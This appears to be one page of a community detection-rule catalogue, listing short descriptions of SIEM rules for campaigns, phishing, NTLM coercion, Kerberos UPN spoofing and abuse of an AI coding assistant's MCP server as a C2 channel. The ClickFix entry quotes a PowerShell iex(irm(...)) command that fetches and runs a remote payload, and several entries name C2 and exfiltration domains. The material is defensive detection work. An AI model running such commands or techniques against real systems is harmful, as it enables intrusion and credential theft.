Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

39,169 detections

Detects anomalous process execution and loopback network activity associated with the Model Context Protocol (MCP) 'exec_in_session' method. This pattern indicates an adversary potentially abusing the AI coding assistant's MCP server capabilities to execute arbitrary commands as a C2 channel.
avatar
Arnold Chan@slaz
Defender - KQL
2 days ago
201
Detects anomalous process execution and loopback network activity associated with the Model Context Protocol (MCP) 'exec_in_session' method. This pattern indicates an adversary potentially abusing the AI coding assistant's MCP server capabilities to execute arbitrary commands as a C2 channel.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
2 days ago
001
This rule performs an indicator of compromise (IOC) sweep for activities associated with the TOPHIT / VHX Harvester / @prime0 NPM typosquatting campaign. It detects known malicious C2 network connections (IPs and URLs), file artifacts (hashes) on endpoints, and suspicious email activity involving specific operator email addresses.
avatar
Arnold Chan@slaz
avatar
SlimKQL
8 days ago
317
Detects a multi-stage process execution chain involving PowerShell: first, a script-based download of remote content, followed by in-memory reflection, and finally, suspicious memory allocation or thread manipulation within the same process context. This pattern is characteristic of fileless malware execution chains designed to evade disk-based detection.
avatar
Arnold Chan@slaz
Defender - KQL
5 days ago
203
This rule performs a multi-source correlation (network, DNS, file, and process telemetry) to detect artifacts associated with the Coruna campaign. It looks for known malicious file hashes (SHA1), C2 IP addresses, and specific domain/URL patterns in process command lines and network connections.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
5 days ago
203
The following analytic identifies a Windows command interpreter process being executed where it's process name does not match it's original file name attribute.
Processes that have been renamed and executed may be an indicator that an adversary is attempting to evade defenses or execute malicious code.
Splunk Security@SplunkSecurity
avatar
Splunk Security Content
2 days ago
001
The following analytic identifies a Python process being executed where it's process name does not match
it's original file name attribute. Processes that have been renamed and executed may be an indicator that
an adversary is attempting to evade defenses or execute malicious code.
Splunk Security@SplunkSecurity
avatar
Splunk Security Content
2 days ago
001
This rule detects potential Browser-in-the-Browser (BitB) phishing attacks by identifying suspicious browser pop-up behavior (using window.open flags, hidden address/toolbars) on non-identity-provider domains, followed shortly by credential submission patterns on the same device. This pattern mimics legitimate OAuth or SSO windows to harvest user credentials.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
9 days ago
309
Detects unauthorized attempts to coerce the File Server VSS Agent (FssAgent) into authenticating to an attacker-controlled host. This is achieved by invoking the IsPathSupported (opnum 8) or IsPathShadowCopied (opnum 9) functions on the FssAgent RPC interface, which can be leveraged to capture NTLM hashes.
avatar
Lacey Cochrane@NullVectorX
avatar
XQL Threat Forge
4 days ago
102
The following analytic detects a user account modifying its own userPrincipalName (UPN) to match the sAMAccountName of another account via Windows Security Event 4738.
This is the setup step of the ResetNightmare attack (CVE-2026-27912), where an attacker with WriteProperty rights on their own UPN attribute spoofs their identity to a target account.
The KDC then resolves a ptype=10 (NT-ENTERPRISE) Kerberos pre-authentication request against the spoofed UPN, issuing a kadmin/changepw TGT that can be used to change the target account's password via kpasswd (port 464).
Event 4738 is generated when a user account attribute is changed. This analytic filters to events where the SubjectUserSid equals the TargetSid (self-modification), the new UPN value is not a standard UPN (no @ sign), and the value is not a Windows placeholder.
A non-UPN value set on one's own account is anomalous and has no legitimate administrative use case.
Splunk Security@SplunkSecurity
avatar
Splunk Security Content
7 days ago
405
Detects a non-browser process creating a Chromium-style History database in a temporary directory, consistent with BraZetsu copying locked browser databases for reconnaissance.
avatar
Luís Marques@remotecodeexecution
avatar
SIBS Cyberwatch
7 days ago
005
Detects a sequence of activity where a user receives a high volume of inbound emails (potential vishing or social engineering lures) within a short window, followed by the user executing Windows Remote Assistance or Quick Assist tools within the next 6 hours, which is highly indicative of remote access social engineering pre-cursors.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
12 days ago
6020
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL 2026
14 days ago
18138
This rule detects potential post-compromise activity related to a campaign using MSP360-masqueraded installers and ScreenConnect remote access tools. It performs an IOC sweep across device file events for known malicious file hashes (associated with installers and post-compromise utilities) and device network events for connections to known malicious domains used for command and control.
avatar
Arnold Chan@slaz
avatar
Hunters
8 days ago
107
This rule monitors for known malicious file hashes, command and control (C2) domains, and specific download URLs associated with identified threats. It correlates these indicators across process execution, file activity, and network connection logs to identify potential compromises or malicious activity related to the aware-cr1 infrastructure.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
5 days ago
003
This rule detects known-malicious activity associated with Warlock ransomware and the ToolShell malware campaign (linked to Storm-2603). It monitors for process, file, and image-load events matching identified malicious file hashes, as well as network connection attempts to known malicious domains and URLs. It also includes monitoring for traffic to 'oastify.com', a domain commonly used for Burp Collaborator, which requires correlation with other indicators to confirm malicious intent.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
5 days ago
103
Detects a sequential pattern where a browser process (Chrome, Edge, or Safari) accesses an AI chat platform's conversation API, followed within 5 minutes by a network connection to a known unauthorized exfiltration destination (api.pbapi.xyz). This pattern suggests the potential use of a browser-based tool or extension (e.g., Poper Blocker or similar) to intercept and exfiltrate AI chat history.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
5 days ago
103
Detects a sequential pattern where a browser process (Chrome, Edge, or Safari) accesses an AI chat platform's conversation API, followed within 5 minutes by a network connection to a known unauthorized exfiltration destination (api.pbapi.xyz). This pattern suggests the potential use of a browser-based tool or extension (e.g., Poper Blocker or similar) to intercept and exfiltrate AI chat history.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
5 days ago
103
This rule monitors for the presence of the PoperBlocker browser extension or network traffic directed to associated domains, which are often used by potentially unwanted programs (PUP) or adware.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
5 days ago
103
This rule monitors for the presence of the PoperBlocker browser extension or network traffic directed to associated domains, which are often used by potentially unwanted programs (PUP) or adware.
avatar
Arnold Chan@slaz
avatar
Hunters
5 days ago
103
Detects DNS lookups and outbound network connections to known command and control (C2) and staging domains associated with the STAC4924 campaign. The rule performs strict matching on domain names to ensure that subdomains are identified while avoiding false positives from partial string matches within URLs.
avatar
Arnold Chan@slaz
avatar
Midnight Slayer
7 days ago
405
Page 6 of 1866